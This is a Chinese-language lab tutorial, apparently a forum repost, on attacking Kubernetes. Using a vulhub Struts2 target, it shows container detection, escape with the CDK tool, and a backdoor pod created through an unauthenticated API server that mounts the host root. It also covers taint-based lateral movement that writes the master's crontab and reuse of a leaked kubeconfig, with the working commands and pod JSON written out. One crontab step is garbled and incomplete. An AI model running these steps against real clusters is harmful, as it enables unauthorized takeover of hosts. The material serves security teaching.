云上攻防-云原生&K8s安全&实战场景&攻击Pod&污点Taint&横向移动&容器逃逸
知识点1、云原生-K8s安全-横向移动-污点Taint
2、云原生-K8s安全-Kubernetes实战场景
一、演示案例-云原生-K8s安全-横向移动-污点Taint
怎样判断实战中可否利用污点Taint?
设置污点
kubectl taint nodes node1 xtz=value1:NoSchedule
去除污点
kubectl taint nodes node1 xtz:NoSchedule-
节点说明中,查找 Taints 字段
拿到node节点权限时可以查看其他node主机或者master主机是否支持用Taint污点横向移动
kubectl describe nodes node-name
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152022031-368020315.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152023525-1304415427.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152026600-603494051.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152028329-837652994.png
二、演示案例-云原生-K8s安全-Kubernetes实战场景
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152100930-841446725.png
1、攻击Pod摆设Web应用
Web应用摆设:(struts2漏洞)
拉取靶场镜像
kubectl create deployment xiaodi --image=vulhub/struts2:2.3.28
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152615596-1148826916.png
查看pod容器的状态(归属节点、内部IP、运行状态等)
kubectl get pods -o wide
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152639708-632925681.png
启动靶场镜像服务
kubectl expose deploy xiaodi --port=8080 --target-port=8080 --type=NodePort
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152707467-1017042368.png
kubectl get pod,svc
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152727184-8287724.png
利用Web漏洞拿下权限
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152741457-291184914.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152753829-1605626896.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152756498-618719384.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152800714-116021874.png
探针当前Webshell环境是否是docker容器
两种情况
1、纯在docker容器里 2、在k8s下的某个主机里的docker容器
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152847365-1088143044.png
ls -al /
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152900633-224614887.png
但是这还没完,因为这个docker容器有很大可能会在k8s下面
cat /proc/1/cgroup
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152925458-1675587361.png
docker逃逸
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152937349-685790286.png
工具地址:https://github.com/cdk-team/CDK
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152947390-1375141450.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152950130-1288966013.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152952080-1363793763.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152953708-1848598057.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152955522-1546378600.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152957565-1279031024.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152959078-1995333805.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153016699-562862778.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153002315-613545649.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153026171-1137275355.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153033888-1882439168.png
2、利用k8s-Api-Server未授权提交创建后门Pod
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153054552-737400508.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153059091-663922165.png
./cdk_linux_amd64 kcurl anonymous post 'https://10.96.0.1:443/api/v1/namespaces/default/pods/' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153114543-1443880342.png
或者
./kubectl -s 10.96.0.1:443 create -f test.yaml //test.yam就是{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}的值
查看后门pod是否创建
curl -k https://10.96.0.1:443/api/v1/namespaces/default/pods
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153300967-419410114.png
3、实现挂载目录宿主机逃逸
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153313861-2069481552.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153317930-1645214070.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153320155-1085012611.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153321689-914778916.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153323420-553543112.png
加参数绕过交互式
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153341802-972218685.png
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec test02 -- bash -c "ls /host" //host目录就是挂载目录,相当于宿主机的/目录,可以自定义的。
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153357125-1200047258.png
4、利用污点Taint横向移动
参考:https://cn-sec.com/archives/1336486.html
获取node节点详情
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes | grep Taints
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153504031-1018517928.png
或者
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153520445-329003257.png
点击查看代码cat > x.yaml > /master/etc/crontab //这里的master路径要留意与上面一致
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153735564-1069515179.png</p>https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153737715-169920696.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153739119-576217006.png
5、利用Config走漏横向移动
也可以利用节点走漏的config横向移动节点
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153754315-19724574.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153755771-1472739797.png
./kubectl -s https://10.96.0.1:443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes ./kubectl apply -f test.yaml -n default --kubeconfig=config ./kubectl -n default --kubeconfig=config exec xiaodisec -- bash -c "ls /mnt/root"
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]